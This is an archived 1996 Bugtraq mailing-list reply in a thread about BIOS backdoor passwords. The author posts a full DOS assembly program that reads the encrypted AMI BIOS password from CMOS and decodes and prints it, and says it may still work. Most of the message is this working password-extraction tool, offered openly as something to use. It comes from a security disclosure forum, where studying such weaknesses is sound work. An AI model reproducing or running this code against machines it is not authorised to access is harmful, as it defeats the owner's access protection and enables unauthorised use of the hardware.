Listserv at NETSPACE.ORG
Listserv at NETSPACE.ORG| View: | Next message | Previous message Next in topic | Previous in topic Next by same author | Previous by same author Previous menu (November 1996, week 4) Main BUGTRAQ menu Search |
| Options: | Chronological order | Most recent first Proportional font | Non-proportional font |
Date: Thu, 21 Nov 1996 08:36:25 -0800
Reply-To: Roger Moar <rmoar@apertos0.csc.UVic.CA>
Sender: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Roger Moar <rmoar@apertos0.csc.UVic.CA>
Subject: Re: BoS: Magic password of some linux-box(Hardware..)
X-To: handcuff@concentric.net
In-Reply-To: <199611202101.QAA17806@cliff.cris.com> from "Brian F. Knoll" at
Nov 20, 96 09:04:22 pm
> Does anyone know if only the Award BIOS is susceptible to this? In other
> words, are other BIOSes, such as AMI BIOS, susceptible to the same sort of
> behavior?
>
> Brian
I don't really remember where I got the following code, but it
worked a few years ago on a 486 machine. If AMI hasn't changed things
much, it may still work.
-Roger.
----------------------------------------------------------------------
; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall
CODE SEGMENT
ORG 100h
ASSUME CS:CODE,DS:CODE
Start PROC NEAR
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->
mov cl,'[' ;Bracket the password v1.1
call CharOut ;display it v1.1
cld ;insure forward v1.1
mov cl,0b7h ;CMOS starting address
;v1.1 lea di,Password
mov di,offset Password ; v1.1
push di ;save for later v1.1
Read_Password:
mov al,cl ;CMOS address we want
out 70h,al
jmp $+2 ;delay a tick
in al,71h ;Get password char
;v1.1 mov [di],al ;stuff in buffer
;v1.1 inc di ;bump
stosb ;stuff in buffer v1.1
inc cl ;bump CMOS address
cmp cl,0b7h+7 ;done 7 chars yet?
jnz Read_Password ;not yet
; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->
;v1.1 lea di,Password
pop di ;restore pointer to password v1.1
and byte ptr [di],0f0h ;mask first char
inc di ;point to next char
Decrypt_Next:
cmp di,Offset Password+7 ;hit end?
jnl Completed ;yep
cmp byte ptr [di],0 ;current char a 0?
jz Completed ;yep, 0 terminated
xor cl,cl ;handy 0
mov ch,byte ptr [di-1] ;get previous char
Decrypt:
inc cl ;build char in CL
mov ah,ch ;char to decrypt
xor dx,dx
test ah,10000000b
jz NotSet7
inc dh
NotSet7:
test ah,01000000b
jz NotSet6
inc dh
NotSet6:
test ah,00000010b
jz NotSet2
inc dh
NotSet2:
test ah,00000001b
jz NotSet1
inc dh
NotSet1:
add dl,2
cmp dl,dh
jl NotSet1 ;loop
sub dl,dh
shr ch,1
cmp dl,1
jnz $+5
add ch,80h
cmp ch,byte ptr [di] ;match next char?
jnz Decrypt ;nope, continue
; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->
mov ah,2 ;display char function
mov dl,cl ;this char
int 21h
inc di ;next char
jmp Decrypt_Next ;loop
; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->
Completed:
mov cl,']' ;Close the bracket v1.1
call CharOut ;display it v1.1
mov ax,4c00h ;terminate, ERRORLEVEL 0
int 21h
Start ENDP
;v1.1 New function: enter with char to display in CL
CharOut PROC NEAR ;v1.1
mov ah,2 ;display char function
mov dl,cl ;this char
int 21h
ret
CharOut ENDP
;Password DB 6 DUP (?)
Password label byte ;dynamic buffer v1.1
CODE ENDS
END Start
--
Roger Moar -- rmoar@csr.uvic.ca | http://apertos0.csc.uvic.ca/~rmoar
Back to the Listserv archive
index for lists hosted at NETSPACE.ORG.